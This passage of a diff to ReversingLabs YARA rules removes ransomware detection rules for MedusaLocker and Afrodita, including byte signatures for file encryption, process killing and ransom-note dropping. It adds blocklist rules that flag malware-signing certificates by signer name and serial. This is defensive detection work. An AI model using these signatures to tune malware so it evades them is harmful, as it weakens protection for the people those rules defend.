-            04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF
-            05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D
-            22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A
-            9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A
-            A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1
-            FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29
-            95
-        }
-		$ecc_public_key_14 = {
-            04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD
-            10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A
-            77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32
-            62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C
-            A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C
-            ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A
-            31
-        }
-		$ecc_public_key_15 = {
-            04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92
-            7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3
-            D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC
-            18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6
-            63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72
-            6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B
-            29
-        }
-		$ecc_public_key_16 = {
-            04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6
-            5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C
-            61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2
-            21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4
-            F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33
-            9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79
-            79
-        }
-		$ecc_public_key_17 = {
-            04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D
-            E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF
-            2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E
-            C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2
-            7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F
-            AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B
-            36
-        }
-		$ecc_public_key_18 = {
-            04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57
-            A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F
-            66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D
-            02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49
-            C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0
-            45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29
-            39
-        }
-		$ecc_public_key_19 = {
-            04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4
-            AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1
-            57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73
-            0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C
-            1D
-        }
-		$ecc_public_key_20 = {
-            04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE
-            B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8
-            E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75
-            DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86
-            31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA
-            C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07
-            AC
-        }
-		$ecc_public_key_21 = {
-            04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F
-            6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6
-            87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6
-            AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21
-            6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28
-            42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3
-            35
-        }
-		$ecc_public_key_22 = {
-            04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7
-            FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F
-            EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28
-            19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C
-            A9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and ( pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures [ i ] . serial == "c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" ) and 1616371200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11442-L11458"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $oid_prime_explicit ) and ( any of ( $ecc_public_key_* ) ) and ( pe.number_of_signatures > 0 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Storeks LLC" and pe.signatures [ i ] . serial == "1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MedusaLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8bfcfe13-b519-5c03-9770-cf245b01c395"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11460-L11476"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08"
+		logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MedusaLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83
-            7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
-            8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57
-            C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ??
-            ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ??
-            6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_p2 = {
-            8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ??
-            ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
-        }
-		$encrypt_files_p3 = {
-            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ??
-            ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ??
-            ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ??
-            89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
-            C2
-        }
-		$search_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D
-            ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83
-            7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B
-            45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ??
-            ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85
-            ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ??
-            ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57
-            FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-            8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$search_files_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ??
-            ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ??
-            ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68
-            ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ??
-            ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ??
-            ?? ?? ?? 83 C4 ?? EB
-        }
-		$enum_resources = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ??
-            ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89
-            54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51
-            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D
-            4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B
-            55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
-            8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$kill_processes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D
-            ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ??
-            ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32
-            C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$kill_processes_call = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ??
-            89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
-		$enum_resources_call = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $kill_processes_call ) and ( $kill_processes ) and ( $enum_resources ) and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources_call )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Afrodita ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "513963fd-5f3d-5d31-a65a-37f6f5c72260"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "3bac20a3-1415-53af-9d04-a30aa7488dd7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11478-L11496"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60"
+		logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Afrodita"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$exclude_directories_and_drop_ransom_note = {
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ??
-            ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ??
